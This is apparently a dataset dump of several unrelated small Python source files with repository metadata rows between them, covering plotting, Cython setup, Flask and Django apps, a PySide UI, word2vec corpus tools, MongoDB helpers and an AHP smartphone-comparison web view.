xmin = x.min()
xmax = x.max()
ymin = y.min()
ymax = y.max()

# Left: hexagonal binning with a linear count scale.
subplot(121)
hexbin(x,y)
axis([xmin, xmax, ymin, ymax])
title("Hexagon binning")
cb = colorbar()
cb.set_label('counts')

# Right: same data with a log10 color scale to bring out the tails.
subplot(122)
hexbin(x,y,bins='log')
axis([xmin, xmax, ymin, ymax])
title("With a log color scale")
cb = colorbar()
cb.set_label('log10(N)')

show()
|
UTF-8
|
Python
| false | false | 2,011 |
4,501,125,775,900 |
5e4a45a187c280c0ef85eb75fe640144691d5e96
|
80a3cc2ebd27f730bcced6f7bc5030017153a950
|
/code/cython-darwin/setup.py
|
26b977ea3cb783c7b4a760d71d42ab13ec54b68a
|
[
"GPL-1.0-or-later"
] |
non_permissive
|
nealholt/wild-black-yonder
|
https://github.com/nealholt/wild-black-yonder
|
cc2ecfa3c53a9666cbb364dcaccb64566ff68f37
|
bc490b99f52a013432d6304be83d4aca963ae63f
|
refs/heads/master
| 2021-01-01T17:15:56.434118 | 2014-01-17T15:08:16 | 2014-01-17T15:08:16 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#http://docs.cython.org/src/userguide/tutorial.html
#run with:
#> python setup.py build_ext --inplace
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
# Each Extension compiles one .pyx module to a C extension; the commented
# entries can be re-enabled to build the additional test modules.
ext_modules = [Extension("cygeometry", ["cygeometry.pyx"])#,
               #Extension("c1", ["c1.pyx"]),
               #Extension("c2", ["c2.pyx"]),
               #Extension("c3", ["c3.pyx"]),
               #Extension("csum", ["csum.pyx"])
               ]

setup(
    name = 'Cython Test Scripts',
    # build_ext from Cython.Distutils translates .pyx -> C before compiling.
    cmdclass = {'build_ext': build_ext},
    ext_modules = ext_modules
)
|
UTF-8
|
Python
| false | false | 2,014 |
12,461 |
4a85dd8f19d0bea022a0a5ef189f1fa7027b504f
|
b6f92e39ae1d67bbbaec6991d31106e44dd54c7e
|
/test_aic.py
|
4a729310199576e3df927edbc451571a8211dbb2
|
[
"LGPL-2.1-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-2.0-only",
"GPL-2.0-or-later"
] |
non_permissive
|
rollovercable/tu_aic_13
|
https://github.com/rollovercable/tu_aic_13
|
f953dd1769396030450f1208f25080377f44e06c
|
d43b5087e2e8e35801b2f47ac5f1f6d7d74dce01
|
refs/heads/master
| 2021-01-12T22:22:52.581633 | 2014-01-30T11:50:24 | 2014-01-30T11:50:24 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import os
import sys
sys.path.append(os.path.abspath('./wsgi'))
import random
import unittest
import json
import aic.app as app
import aic.db as db
class AICTestCase(unittest.TestCase):
    """Integration tests for the task answer-posting API endpoint."""

    def setUp(self):
        """Create a test client and a keyword/project/task fixture row set."""
        self.app = app.application.test_client()
        session = db.Session()
        # Random suffix avoids unique-key collisions across test runs.
        self.keyword = db.Keyword("Testkeyword" + str(random.randint(0,1000000000)))
        session.add(self.keyword)
        session.commit()
        self.project = db.Project("", "")
        session.add(self.project)
        session.commit()
        self.task = db.Task(self.project, self.keyword, "")
        self.task.answers_requested = 1
        session.add(self.task)
        session.commit()

    def test_post_answer_bad_task(self):
        """POSTing an answer to a nonexistent task id returns 404."""
        data = json.dumps({'answer': 'positive', 'user': "testuser"})
        response = self.app.post('/api/task/0/answers', data=data)
        # FIX: assertEquals is a deprecated alias removed in Python 3.12;
        # use assertEqual throughout.
        self.assertEqual(response.status_code, 404)

    def test_post_answer_bad_data(self):
        """POSTing a malformed (non-JSON) body returns 400."""
        data = "bad_data"
        response = self.app.post('/api/task/%s/answers' % self.task.id, data=data)
        self.assertEqual(response.status_code, 400)

    def test_post_answer(self):
        """POSTing a well-formed answer to an existing task returns 200."""
        data = json.dumps({'answer': 'positive', 'user': "testuser"})
        response = self.app.post('/api/task/%s/answers' % self.task.id, data=data)
        self.assertEqual(response.status_code, 200)
if __name__ == '__main__':
    # Run the test suite through the unittest CLI runner.
    unittest.main()
|
UTF-8
|
Python
| false | false | 2,014 |
12,232,066,878,683 |
24e08185800982cd8552b1e5f4fd1fd3a6ca59ad
|
4e2dea834ae30124966faa34c5eedfff40ada6a6
|
/experimental/tools/scoremanagertools/iotools/Menu/test/test_Menu_toggle_menu_commands.py
|
0cf0a02dc3275c52afef4bc9cb92b52b0788616f
|
[
"GPL-3.0-or-later",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"GPL-3.0-only",
"LGPL-2.1-or-later",
"AGPL-3.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference"
] |
non_permissive
|
adorsk/abjad
|
https://github.com/adorsk/abjad
|
511dda74321abaff3fb5517ea88b2e410c95c17b
|
6664257cd396b607707c3836500e30c5b0daa20b
|
refs/heads/master
| 2020-12-25T22:36:52.886482 | 2014-01-17T02:13:32 | 2014-01-17T02:13:32 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- encoding: utf-8 -*-
from experimental import *
def test_Menu_toggle_menu_commands_01():
    """Toggling menu commands ('tmc') hides the 'new score' menu entry.

    The transcript entry at index 0 is the initial menu; index 2 is the
    menu redisplayed after the toggle command ran.
    """
    score_manager = scoremanagertools.scoremanager.ScoreManager()
    score_manager._run(pending_user_input='tmc q')
    starting_menu_lines = score_manager.session.io_transcript[0][1]
    modified_menu_lines = score_manager.session.io_transcript[2][1]
    new_score_menu_line = ' new score (new)'
    assert new_score_menu_line in starting_menu_lines
    # FIX: use the idiomatic 'not in' instead of 'not x in y'.
    assert new_score_menu_line not in modified_menu_lines
|
UTF-8
|
Python
| false | false | 2,014 |
4,432,406,297,248 |
4477a5b54d68c76e521d251aa066a803a73d98c9
|
89e8a5e404e168115dc4edd270bedec80a84111d
|
/pyside_ui/navigator_ui.py
|
035645ea289f93b86fa303d8e5015cc0d79ab3f5
|
[
"MIT"
] |
permissive
|
alaindomissy/cadnano_navigator
|
https://github.com/alaindomissy/cadnano_navigator
|
5e96511addf3e8bb08198d35055c9bd3f3915058
|
9b6ea2af0f8465587f02cbf41f2b1dfe8c8f91d3
|
refs/heads/master
| 2020-12-24T10:56:07.802831 | 2014-05-14T20:15:39 | 2014-05-14T20:15:39 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'navigator.ui'
#
# Created: Tue May 13 17:46:18 2014
# by: pyside-uic 0.2.14 running on PySide 1.1.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Dialog(object):
    """Auto-generated (pyside-uic) UI definition for the Navigator dialog.

    NOTE(review): this class is generated from navigator.ui — manual edits
    will be lost on regeneration, so only comments are added here.
    """
    def setupUi(self, Dialog):
        """Build the widget tree and layouts for *Dialog*."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(470, 236)
        # Outer container and vertical layout holding all rows.
        self.verticalLayoutWidget = QtGui.QWidget(Dialog)
        self.verticalLayoutWidget.setGeometry(QtCore.QRect(9, 0, 451, 221))
        self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
        self.verticalLayout = QtGui.QVBoxLayout(self.verticalLayoutWidget)
        self.verticalLayout.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout.setObjectName("verticalLayout")
        # Header labels.
        self.label = QtGui.QLabel(self.verticalLayoutWidget)
        self.label.setEnabled(True)
        self.label.setAlignment(QtCore.Qt.AlignCenter)
        self.label.setObjectName("label")
        self.verticalLayout.addWidget(self.label)
        self.label_2 = QtGui.QLabel(self.verticalLayoutWidget)
        self.label_2.setObjectName("label_2")
        self.verticalLayout.addWidget(self.label_2)
        # Row 1: strand-following buttons (follow 5p / center / follow 3p).
        self.gridLayout_2 = QtGui.QGridLayout()
        self.gridLayout_2.setSizeConstraint(QtGui.QLayout.SetDefaultConstraint)
        self.gridLayout_2.setContentsMargins(10, -1, 10, -1)
        self.gridLayout_2.setObjectName("gridLayout_2")
        self.follow3pButton = QtGui.QPushButton(self.verticalLayoutWidget)
        self.follow3pButton.setFocusPolicy(QtCore.Qt.StrongFocus)
        self.follow3pButton.setAutoDefault(False)
        self.follow3pButton.setObjectName("follow3pButton")
        self.gridLayout_2.addWidget(self.follow3pButton, 0, 2, 1, 1)
        self.follow5pButton = QtGui.QPushButton(self.verticalLayoutWidget)
        self.follow5pButton.setFocusPolicy(QtCore.Qt.StrongFocus)
        self.follow5pButton.setAutoDefault(False)
        self.follow5pButton.setObjectName("follow5pButton")
        self.gridLayout_2.addWidget(self.follow5pButton, 0, 0, 1, 1)
        self.centerOnStrandButton = QtGui.QPushButton(self.verticalLayoutWidget)
        self.centerOnStrandButton.setFocusPolicy(QtCore.Qt.StrongFocus)
        self.centerOnStrandButton.setAutoDefault(False)
        self.centerOnStrandButton.setObjectName("centerOnStrandButton")
        self.gridLayout_2.addWidget(self.centerOnStrandButton, 0, 1, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_2)
        spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem)
        # Row 2: pathview navigation ("center selected").
        self.label_6 = QtGui.QLabel(self.verticalLayoutWidget)
        self.label_6.setObjectName("label_6")
        self.verticalLayout.addWidget(self.label_6)
        self.gridLayout_6 = QtGui.QGridLayout()
        self.gridLayout_6.setContentsMargins(10, -1, 10, -1)
        self.gridLayout_6.setObjectName("gridLayout_6")
        spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Minimum)
        self.gridLayout_6.addItem(spacerItem1, 0, 2, 1, 1)
        self.centerOnSelectedButton = QtGui.QPushButton(self.verticalLayoutWidget)
        self.centerOnSelectedButton.setFocusPolicy(QtCore.Qt.StrongFocus)
        self.centerOnSelectedButton.setAutoDefault(False)
        self.centerOnSelectedButton.setObjectName("centerOnSelectedButton")
        self.gridLayout_6.addWidget(self.centerOnSelectedButton, 0, 1, 1, 1)
        spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Minimum)
        self.gridLayout_6.addItem(spacerItem2, 0, 0, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_6)
        spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem3)
        # Row 3: active base index input and "slice to selected" button.
        self.label_3 = QtGui.QLabel(self.verticalLayoutWidget)
        self.label_3.setObjectName("label_3")
        self.verticalLayout.addWidget(self.label_3)
        self.gridLayout_5 = QtGui.QGridLayout()
        self.gridLayout_5.setContentsMargins(10, -1, 10, -1)
        self.gridLayout_5.setObjectName("gridLayout_5")
        self.label_4 = QtGui.QLabel(self.verticalLayoutWidget)
        self.label_4.setObjectName("label_4")
        self.gridLayout_5.addWidget(self.label_4, 0, 0, 1, 1)
        self.activeBaseIndexInput = QtGui.QLineEdit(self.verticalLayoutWidget)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.activeBaseIndexInput.sizePolicy().hasHeightForWidth())
        self.activeBaseIndexInput.setSizePolicy(sizePolicy)
        self.activeBaseIndexInput.setObjectName("activeBaseIndexInput")
        self.gridLayout_5.addWidget(self.activeBaseIndexInput, 0, 1, 1, 1)
        self.sliceToSelectedButton = QtGui.QPushButton(self.verticalLayoutWidget)
        self.sliceToSelectedButton.setFocusPolicy(QtCore.Qt.StrongFocus)
        self.sliceToSelectedButton.setAutoDefault(False)
        self.sliceToSelectedButton.setObjectName("sliceToSelectedButton")
        self.gridLayout_5.addWidget(self.sliceToSelectedButton, 0, 2, 1, 1)
        self.verticalLayout.addLayout(self.gridLayout_5)
        spacerItem4 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem4)
        self.verticalLayout.setStretch(9, 1)
        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        """Assign all translated display strings to the widgets."""
        Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "caDNAno Navigator", None, QtGui.QApplication.UnicodeUTF8))
        self.label.setText(QtGui.QApplication.translate("Dialog", "Navigate the cadnano view:", None, QtGui.QApplication.UnicodeUTF8))
        self.label_2.setText(QtGui.QApplication.translate("Dialog", "Center on oligo strands:", None, QtGui.QApplication.UnicodeUTF8))
        self.follow3pButton.setText(QtGui.QApplication.translate("Dialog", "Follow 3p", None, QtGui.QApplication.UnicodeUTF8))
        self.follow5pButton.setText(QtGui.QApplication.translate("Dialog", "Follow 5p", None, QtGui.QApplication.UnicodeUTF8))
        self.centerOnStrandButton.setText(QtGui.QApplication.translate("Dialog", "Center strand", None, QtGui.QApplication.UnicodeUTF8))
        self.label_6.setText(QtGui.QApplication.translate("Dialog", "Move around the pathview:", None, QtGui.QApplication.UnicodeUTF8))
        self.centerOnSelectedButton.setText(QtGui.QApplication.translate("Dialog", "Center selected", None, QtGui.QApplication.UnicodeUTF8))
        self.label_3.setText(QtGui.QApplication.translate("Dialog", "Active base index (slicer):", None, QtGui.QApplication.UnicodeUTF8))
        self.label_4.setText(QtGui.QApplication.translate("Dialog", "Move to baseindex: ", None, QtGui.QApplication.UnicodeUTF8))
        self.sliceToSelectedButton.setText(QtGui.QApplication.translate("Dialog", "Slice to selected", None, QtGui.QApplication.UnicodeUTF8))
|
UTF-8
|
Python
| false | false | 2,014 |
11,742,440,591,662 |
a168d12f30e21211e17352f053c6fdaae354493f
|
5ff2d2f8b3f6122fe9b9b783c40a7829b8e79dfd
|
/corpus.py
|
366c9a306f2bed63f74975d9bdc931df4b9b7569
|
[
"BSD-3-Clause"
] |
permissive
|
smrmkt/sample_mecab_word2vec
|
https://github.com/smrmkt/sample_mecab_word2vec
|
c6daa6ad837277fa8afa9b19fe700ea89e63081f
|
40c0eaace43a662c2efac8bb4ebd5179ef7ebab1
|
refs/heads/master
| 2016-09-06T12:35:45.061452 | 2014-04-20T10:32:31 | 2014-04-20T10:32:31 | 18,961,787 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
#-*- coding: utf-8 -*
import argparse
from lib.Parser import Parser
from lib.Vectorizer import Vectorizer
# Command-line arguments: sub-command plus input/output paths.
parser = argparse.ArgumentParser()
parser.add_argument('menu')                 # one of: parse / vectorize / calc
parser.add_argument('in_path')              # input corpus or stored model
parser.add_argument('out_path', nargs='?')  # optional output path
def get_input():
    """Prompt for a word-arithmetic formula and split it into terms.

    A formula such as "king-man+woman" is split on '+' and '-': the first
    word of every '+'-term is a positive term, and every word following a
    '-' is a negative term.  Returns a (pos, neg) pair of lists.
    """
    positives = []
    negatives = []
    formula = raw_input('\nplease input formula(or "END"): ')
    for term in formula.split('+'):
        parts = term.split('-')
        positives.append(parts[0])
        negatives.extend(parts[1:])
    return positives, negatives
if __name__ == '__main__':
    args = parser.parse_args()
    menu = args.menu
    in_path = args.in_path
    out_path = args.out_path
    # Dispatch on the requested sub-command.
    if menu == 'parse':
        # Tokenize the input corpus with MeCab (wakati = space-separated).
        p = Parser('-Owakati')
        p.parse_file(in_path, out_path)
    elif menu == 'vectorize':
        # Train word vectors from the tokenized corpus and persist them.
        v = Vectorizer(min_count=10)
        v.build_from_file(in_path)
        v.store(out_path)
    elif menu == 'calc':
        # Interactive word-arithmetic REPL over a stored model.
        v = Vectorizer()
        v.load(in_path)
        while True:
            pos, neg = get_input()
            if pos[0] == 'END':
                break;
            else:
                v.calc(pos, neg)
|
UTF-8
|
Python
| false | false | 2,014 |
16,020,228,029,868 |
50fb2de104336750ec7acb4826cce5183466301e
|
8068feb8b12d2a26916def72c99a808332b0149f
|
/goose_extractor.py
|
977913031d0ad5ddf47c331e16d72b16a1db5dea
|
[] |
no_license
|
KeithYue/WebdataPipeline
|
https://github.com/KeithYue/WebdataPipeline
|
4e25d2d9dd7ad893d608f6a82dac9910b9edcd91
|
d2fb08887fb53f7b8dfbd511e79b6478407564de
|
refs/heads/master
| 2020-09-12T20:42:40.104460 | 2014-08-20T04:43:09 | 2014-08-20T04:43:09 | 20,519,131 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import re
import time
import urllib2
from goose import Goose
from goose.text import StopWordsChinese
def extract_content(html):
    """Extract the main article body text from raw HTML via Goose.

    The Chinese stop-word list is configured so Chinese-language pages
    are segmented correctly.
    """
    extractor = Goose({'stopwords_class': StopWordsChinese})
    article = extractor.extract(raw_html=html)
    return article.cleaned_text
def test():
    # Smoke test: download one 163.com news article and print its body.
    # NOTE(review): requires live network access; not suitable for CI.
    url = 'http://news.163.com/09/1109/02/5NL6V0VB000120GU.html'
    raw_html = urllib2.urlopen(url).read()
    print extract_content(raw_html)
if __name__=='__main__':
    # Manual entry point: run the network smoke test.
    test()
|
UTF-8
|
Python
| false | false | 2,014 |
5,299,989,684,402 |
9de3486775ca3a31342e05f846e6aca8612e55d2
|
acd0614dcef13950135f36f97015fcf2890f53aa
|
/download/models.py
|
9c342e76d9d89918507633be3a85ba6aca6aaaaf
|
[] |
no_license
|
lxstar/fileserver_v2
|
https://github.com/lxstar/fileserver_v2
|
4158ddac570a82eacaaafd53b5011bd1352799fa
|
a5715f4aafdc8313f747b9184265eec100390afd
|
refs/heads/master
| 2020-03-27T03:10:11.317351 | 2014-07-23T06:52:23 | 2014-07-23T06:52:23 | 22,135,030 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# -----------------------------------------------------
# FileName: models.py
# Author : liuxing2@
# Project : fileserver.download
# Date : 2014-05-28 14:07
# Descrip : download object model
# -----------------------------------------------------
from django.db import models
class DownloadFileModel(models.Model):
    """
    use:
        save data to database from DownloadFileForm

    Records a single download event: when it happened, which file was
    served, and the client IP that requested it.
    """
    # Set automatically to the row's creation time (auto_now_add).
    filetime = models.DateTimeField(auto_now_add=True)
    # Path of the downloaded file, capped at 500 characters.
    filepath = models.CharField(max_length=500)
    # IP address of the requesting client.
    clientip = models.IPAddressField()
|
UTF-8
|
Python
| false | false | 2,014 |
3,350,074,519,395 |
ea490d726923c905aa780110eec8b1c81e210fdc
|
eba33d3257651c9f6b4c246ab74b6bf6934aa514
|
/myMongoDB.py
|
22de74c6bc9bfaae738deaa30d70a9ce612905ce
|
[] |
no_license
|
strocchia/Flask-myFood2.0
|
https://github.com/strocchia/Flask-myFood2.0
|
0ab0679b6562b168b40d8b46a4e16930f7960ae5
|
a973220388fc709aa96a16fa4c03c817d0703101
|
refs/heads/master
| 2016-09-05T21:33:50.740459 | 2013-11-12T03:27:37 | 2013-11-12T03:27:37 | 14,321,162 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# MongoDB wins! (>> SQL-Alchemy, > SQLite3)
# ... because: it can save whole dictionaries to db
import pymongo
import datetime
#from app import db
#class Meal_Type(db.Document):
# lunch = db.StringField(max_length=255)
# dinner = db.StringField(max_length=255)
# misc = db.StringField(max_length=255)
# today_date = db.DateTimeField(default=datetime.datetime.now)
def setup_db():
    """Connect to the local MongoDB server and return the food_entries
    collection from the `fooddata` database."""
    connection = pymongo.Connection()
    database = connection.fooddata
    # debugging: print database
    return database.food_entries
def insertData_to_db(collection, dictToInsert):
    """Insert one document into *collection*, then dump the whole
    collection to stdout as a debug check.

    Python 2 code (print statements). The find() pass is purely
    diagnostic output verifying the insert landed.
    """
    # 1.) INSERT
    collection.insert(dictToInsert)
    # 2.) FIND: cursor over every document in the collection.
    meals = collection.find()
    #meals = collection.find_one()
    print ""
    print "###################"
    print "INSERT & FIND TEST"
    print "###################"
    print "%d instances in food_entries collection" % collection.count()
    for meal in meals:
        print meal
    print ""
|
UTF-8
|
Python
| false | false | 2,013 |
17,420,387,361,412 |
98b6e57334c5d50bf7360c7340c8cd2ac598983e
|
7df1d3ea5231a811ca25e9c5b9729e52352f3fea
|
/preprocessing/add_freebase_id.py
|
5df166a379a0d787cffc99061104514f7070ce99
|
[
"MIT"
] |
permissive
|
postfix/ensu
|
https://github.com/postfix/ensu
|
a82cc807b1f4d13df0297f6b546a7b58ffe5494f
|
8d189064e0ce90f374b6527a18182c4284512eef
|
refs/heads/master
| 2017-05-02T21:30:32.198876 | 2014-10-13T20:30:02 | 2014-10-13T20:30:02 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
import sys
import csv
import copy
# Python 2-only setup: re-import sys so setdefaultencoding (removed by
# site.py) becomes callable, then force UTF-8 as the default encoding.
reload(sys)
sys.setdefaultencoding('utf-8')
# Allow arbitrarily large CSV fields (the default limit is 128 KiB).
csv.field_size_limit(sys.maxsize)
def main():
    """Annotate CSV rows from stdin with their Freebase id.

    Loads the id -> freebase-id mapping from map_id_freebase_id.csv, then
    for every stdin row whose second column has a (truthy) mapping, writes
    the row to stdout with the Freebase id inserted at index 2. Rows
    without a mapping are dropped.
    """
    freebase_ids = {}
    with open('map_id_freebase_id.csv', 'rb') as mapping_file:
        for record in csv.reader(mapping_file):
            freebase_ids[record[0]] = record[1]
    out = csv.writer(sys.stdout)
    for record in csv.reader(sys.stdin):
        if freebase_ids.get(record[1]):
            augmented = copy.copy(record)
            augmented.insert(2, freebase_ids[record[1]])
            out.writerow(augmented)
# Filter/augment the CSV stream from stdin when run as a script.
if __name__ == "__main__":
    main()
|
UTF-8
|
Python
| false | false | 2,014 |
14,499,809,629,948 |
0781831805dfd58bbb23183db34dde23731e3f51
|
ef7dbcf5ce0304d5536eb580d58f6cc344dab165
|
/ahp/core/views.py
|
e36a93c1c75f51de9550b6146c239d8e0cdb5b79
|
[] |
no_license
|
kleko09/django-ahp
|
https://github.com/kleko09/django-ahp
|
d4e725992afc88dc95c6d11dac40b75ee1837059
|
77c56a0dd9275bb66b2c22f0c2db9ea0312021fe
|
refs/heads/master
| 2016-08-05T14:04:59.204703 | 2013-06-08T17:46:25 | 2013-06-08T17:46:25 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding=UTF-8
from ahp.algorithm import ahp_algorithm
from ahp.core import utils
from ahp.core.forms import CompareForm, SelectSmartphonesForm
from ahp.core.models import CriterionRating, Smartphone, Criterion, Rating
from braces.views import LoginRequiredMixin
from django.core.exceptions import ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.http.response import Http404
from django.shortcuts import redirect
from django.views.generic.base import TemplateView
from django.views.generic.edit import FormView
from django.views.generic.list import ListView
from django.db.models import Q
class HomeView(TemplateView):
    """Render the static home page."""
    template_name = "core/home.html"
class ExampleView(TemplateView):
    """Render a fully worked AHP example using hard-coded matrices."""
    template_name = "core/example.html"

    def get_context_data(self, **kwargs):
        """Build the example context: the raw matrices, their normalised
        forms, the S vectors and the resulting ranking, plus the labels
        shown in the template."""
        # NOTE(review): super(TemplateView, self) skips TemplateView in the
        # MRO; super(ExampleView, self) is the conventional form — confirm.
        ctx = super(TemplateView, self).get_context_data(**kwargs)
        # Pairwise comparison of the four criteria (Saaty 1-9 scale);
        # reciprocal entries mirror the upper triangle.
        comparison_matrix = [[1, 3, 7, 9],
                             [1. / 3, 1, 3, 7],
                             [1. / 7, 1. / 3, 1, 3],
                             [1. / 9, 1. / 7, 1. / 3, 1]]
        # One matrix per criterion comparing the four phones.
        cena_matrix = [[1, 9, 7, 5],
                       [1. / 9, 1, 7, 5],
                       [1. / 7, 1. / 7, 1, 3],
                       [1. / 5, 1. / 5, 1. / 3, 1]]
        parametry_matrix = [[1, 1, 1. / 7, 2],
                            [1, 1, 1. / 7, 2],
                            [7, 7, 1, 9],
                            [1. / 2, 1. / 2, 1. / 9, 1]]
        wykonanie_matrix = [[1, 1. / 2, 3, 7],
                            [2, 1, 3, 5],
                            [1. / 3, 1. / 3, 1, 3],
                            [1. / 7, 1. / 5, 1. / 3, 1]]
        wyswietlacz_matrix = [[1, 3, 7, 3],
                              [1. / 3, 1, 3, 5],
                              [1. / 7, 1. / 3, 1, 1. / 3],
                              [1. / 3, 1. / 5, 3, 1]]
        matrices = [comparison_matrix, cena_matrix, parametry_matrix, wykonanie_matrix, wyswietlacz_matrix]
        # Run the individual AHP steps so each intermediate result can be
        # displayed alongside the final ranking.
        normalized = ahp_algorithm._normalize_table(matrices)
        s_vectors = ahp_algorithm._s_vectors(normalized)
        ranking = ahp_algorithm._create_ranking(s_vectors)
        # Display labels (criteria are Polish: price, specs, build, display).
        criteria = ['cena', 'parametry', 'wykonanie', 'wyświetlacz']
        objects = ['BlackBerry Z10', 'IPhone 5', 'Samsung Galaxy S4', 'Sony Xperia Z']
        ctx.update({'criteria': criteria,
                    'objects': objects,
                    'matrices':matrices,
                    'normalized_matrices': normalized,
                    's_vectors': s_vectors,
                    'ranking' : ranking
                    })
        return ctx

    def print_matrix(self, matrix):
        """Debug helper: print *matrix* as tab-separated rows (Python 2)."""
        print "\n".join(["\t".join(map(str, r)) for r in matrix])
class SmartphonesListView(ListView):
    """Paginated listing of all smartphones."""
    template_name = "core/smartphones_list.html"
    model = Smartphone
    # 30 phones per page.
    paginate_by = 30
class RateView(LoginRequiredMixin, TemplateView):
    """Show the pairwise rating page for two smartphones and persist any
    ratings submitted via 'cr_<criterion_pk>' GET parameters.

    NOTE(review): ratings are created/updated/deleted as a side effect of
    get_context_data, i.e. of a GET request — confirm this is intended.
    """
    template_name = "core/rate.html"

    def get(self, request, *args, **kwargs):
        # Plain delegation; kept for explicitness.
        return super(RateView, self).get(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        """Resolve both smartphones from URL kwargs, apply any submitted
        ratings, and expose the criteria annotated with the user's rating
        on attribute ``r`` (negated when stored in the opposite
        orientation). Raises Http404 on bad pks or malformed parameters.
        """
        ctx = super(RateView, self).get_context_data(**kwargs)
        try:
            first = Smartphone.objects.get(pk=kwargs.get('first'))
            second = Smartphone.objects.get(pk=kwargs.get('second'))
            if first == second:
                pass
            # TODO: handle comparing a smartphone against itself.
            ctx.update({"first": first,
                        'second': second})
        except Exception:
            raise Http404
        items = self.request.GET.items()
        for i in items:
            # Rating parameters are named 'cr_<criterion_pk>'.
            if i[0][:3] == 'cr_':
                try:
                    rating_value = int(i[1])
                    criterion = Criterion.objects.get(pk=int(i[0][3:]))
                    if Rating.objects.is_rated(self.request.user, first, second, criterion):
                        # A rating may be stored in either orientation, so
                        # match both (first, second) and (second, first).
                        rating_object = Rating.objects.get(
                            Q(user=self.request.user,
                              first_smartphone=first,
                              second_smartphone=second,
                              criterion=criterion) |
                            Q(user=self.request.user,
                              first_smartphone=second,
                              second_smartphone=first,
                              criterion=criterion)
                            )
                        if rating_value == 0:
                            # 0 means "no preference": drop the stored rating.
                            rating_object.delete()
                        else:
                            # Keep the stored orientation; negate when reversed.
                            if rating_object.first_smartphone == first and rating_object.second_smartphone == second:
                                rating_object.rating = rating_value
                            elif rating_object.first_smartphone == second and rating_object.second_smartphone == first:
                                rating_object.rating = -rating_value
                            rating_object.save()
                    else:
                        if rating_value != 0:
                            rate = Rating(user=self.request.user,
                                          first_smartphone=first,
                                          second_smartphone=second,
                                          criterion=criterion,
                                          rating=rating_value)
                            rate.save()
                # Python 2 except syntax; any parse/lookup failure -> 404.
                except Exception, e:
                    raise Http404
        # Collect this user's ratings for the pair, in either orientation.
        ratings = list(Rating.objects.filter(user=self.request.user
                                             ).filter(Q(first_smartphone=first,
                                                        second_smartphone=second) |
                                                      Q(first_smartphone=second,
                                                        second_smartphone=first)))
        criteria = Criterion.objects.all()
        for c in criteria:
            r = next((r for r in ratings if r.criterion == c), None)
            if r:
                if r.first_smartphone == first and r.second_smartphone == second:
                    c.r = r.rating
                elif r.first_smartphone == second and r.second_smartphone == first:
                    c.r = -r.rating
        ctx.update({"criteria": criteria
                    })
        return ctx
class RateChooseSmartphonesView(LoginRequiredMixin, FormView):
    """Let a logged-in user pick the two smartphones they want to rate."""

    form_class = SelectSmartphonesForm
    template_name = 'core/rate_choose_smartphones.html'

    def get_context_data(self, **kwargs):
        """Add the user's recently rated smartphone pairs to the context."""
        context = super(RateChooseSmartphonesView, self).get_context_data(**kwargs)
        context['recently_rated'] = (Rating.objects
                                     .filter(user=self.request.user)
                                     .distinct('first_smartphone', 'second_smartphone'))
        return context

    def get_success_url(self):
        """Redirect to the rating page for the two chosen smartphone pks."""
        chosen_first = int(self.request.POST.get('first'))
        chosen_second = int(self.request.POST.get('second'))
        return reverse('rate', args=[chosen_first, chosen_second])
class CompareView(LoginRequiredMixin, FormView):
    """Run the AHP comparison: store the submitted criterion ratings,
    build the matrices and render the winning smartphone."""
    form_class = CompareForm
    template_name = 'core/compare.html'

    def form_valid(self, form):
        """Build the AHP matrices for the selected smartphones and render
        the result page with the winner plus the rest of the ranking."""
        smartphones = list(form.cleaned_data['smartphones'])
        smartphones.reverse()
        criteria = Criterion.objects.all()
        matrices = []
        # First matrix: the user's pairwise criterion comparisons.
        matrices.append(utils.get_comparison_matrix(self.request.user))
        # One matrix per criterion comparing the chosen smartphones.
        for c in criteria:
            m = utils.get_matrix_for_smartphones(smartphones, c)
            matrices.append(m)
        r, s, norm = ahp_algorithm.ahp(matrices)
        # The smartphone with the highest ranking score wins.
        result = smartphones[r.index(max(r))]
